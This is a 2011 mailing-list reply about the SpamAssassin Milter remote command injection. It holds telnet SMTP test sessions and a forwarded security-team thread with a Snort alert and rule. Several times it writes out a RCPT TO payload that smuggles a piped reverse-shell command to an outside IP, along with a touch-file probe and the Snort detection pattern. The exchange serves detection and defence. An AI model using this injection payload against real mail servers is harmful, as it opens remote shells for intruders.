Hi, Seems ok with postfix unless I missed something, which is possible.
$ telnet klunky.co.uk 25 Trying 62.58.61.184... Connected to logout.klunky.co.uk. Escape character is '^]'. 220 klunky.co.uk ESMTP Postfix ehlo klunky.co.uk 250-klunky.co.uk 250-PIPELINING 250-SIZE 20480000 250-ETRN 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN MAIL FROM:<asd...@klunky.co.uk> 250 2.1.0 Ok RCPT TO:root+:"|touch /tmp/foo" 501 5.1.3 Bad recipient address syntax RCPT TO:<root+:"|touch /tmp/foo"> 550 5.1.0 <asd...@klunky.co.uk>: Sender address rejected: User unknown in virtual mailbox table RCPT TO:<root@localhost+:"|touch /tmp/foo"> 501 5.1.3 Bad recipient address syntax rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0" 501 5.1.3 Bad recipient address syntax rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"> 250 2.1.5 Ok data 354 End data with <CR><LF>.<CR><LF> . qu250 2.0.0 Ok: queued as 24E96819DF 502 5.5.2 Error: command not recognized it 221 2.0.0 Bye Connection closed by foreign host. $ telnet klunky.co.uk 25 Trying 62.58.61.184... Connected to logout.klunky.co.uk. Escape character is '^]'. 220 klunky.co.uk ESMTP Postfix ehlo klunky.co.uk 250-klunky.co.uk 250-PIPELINING 250-SIZE 20480000 250-ETRN 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN MAIL FROM:<asd...@klunky.co.uk> 250 2.1.0 Ok rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"> 550 5.1.0 <asd...@klunky.co.uk>: Sender address rejected: User unknown in virtual mailbox table quit 221 2.0.0 Bye Connection closed by foreign host. $ telnet klunky.co.uk 25 Trying 62.58.61.184... Connected to logout.klunky.co.uk. Escape character is '^]'. 220 klunky.co.uk ESMTP Postfix ehlo klunky.co.uk 250-klunky.co.uk 250-PIPELINING 250-SIZE 20480000 250-ETRN 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN MAIL FROM:<asd...@klunky.co.uk> 250 2.1.0 Ok rcpt to:<root+:"|exec /bin/sh 0</dev/tcp/62.58.61.184/45295 1>&0 2>&0"> 550 5.1.0 <asd...@klunky.co.uk>: Sender address rejected: User unknown in virtual mailbox table quit 221 2.0.0 Bye Connection closed by foreign host. On 02/10/2011 06:42 PM, Michael Scheidell wrote: > heads up: > > if case you are using spamassassin milter: > > active exploits going on. > > <http://seclists.org/fulldisclosure/2010/Mar/140> > <http://www.securityfocus.com/bid/38578> > > Vulnerable: SpamAssassin Milter Plugin SpamAssassin Milter Plugin 0.3.1 > > I don't see anything on bugtraq about a fix. > > > -------- Original Message -------- > Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin > Milter Plugin Remote Arbitrary Command Injection Attempt > > > > > > > > > > > > The rule is only looking for this: > > content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|"; > > > > Personally, I would probably block it. Although, if we’re not seeing > this sort of thing pop up on customer’s boxes, a manual block in > scanner2 is sufficient for now, right? > > > > Either way, let me know and I’ll block/unblock/leave alone. > > > > > > -- > > John Meyer > > Associate Security Engineer > > >|SECNAP Network Security > > Office: (561) 999-5000 x:1235 > > Direct: (561) 948-2264 > > > > *From:*Michael Scheidell > *Sent:* Thursday, February 10, 2011 12:25 PM > *To:* John Meyer > *Cc:* Jonathan Scheidell; Anthony Wetula > *Subject:* Re: alert: New event: ET EXPLOIT Possible SpamAssassin > Milter Plugin Remote Arbitrary Command Injection Attempt > > > > is the snort rule specific enough that you can block the offending ip > for 5 mins? > > (if its a real smtp server, it will retry) and legit email through. > > > > On 2/10/11 12:12 PM, John Meyer wrote: > > I don’t like the looks of this. I blocked that IP with samtool. > > > > Payload: > > > > rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0" > > data > > . > > quit > > > > > > > > -- > > John Meyer > > Associate Security Engineer > > >|SECNAP Network Security > > Office: (561) 999-5000 x:1235 > > Direct: (561) 948-2264 > > > > *From:*SECNAP Network Security > *Sent:* Thursday, February 10, 2011 12:01 PM > *To:* security-al...@scanner2.secnap.com > *Subject:* alert: New event: ET EXPLOIT Possible SpamAssassin Milter > Plugin Remote Arbitrary Command Injection Attempt > > > > 02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25 > [1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote > Arbitrary Command Injection Attempt > [Classification: Attempted User Privilege Gain] [Priority: 1] > > > > -- > Michael Scheidell, CTO > o: 561-999-5000 > d: 561-948-2259 > ISN: 1259*1300 > >*| *SECNAP Network Security Corporation > > · Certified SNORT Integrator > > · 2008-9 Hot Company Award Winner, World Executive Alliance > > · Five-Star Partner Program 2009, VARBusiness > > · Best in Email Security,2010: Network Products Guide > > · King of Spam Filters, SC Magazine 2008 > > > ------------------------------------------------------------------------ > > This email has been scanned and certified safe by SpammerTrap®. > For Information please see http://www.secnap.com/products/spammertrap/ > > ------------------------------------------------------------------------ >
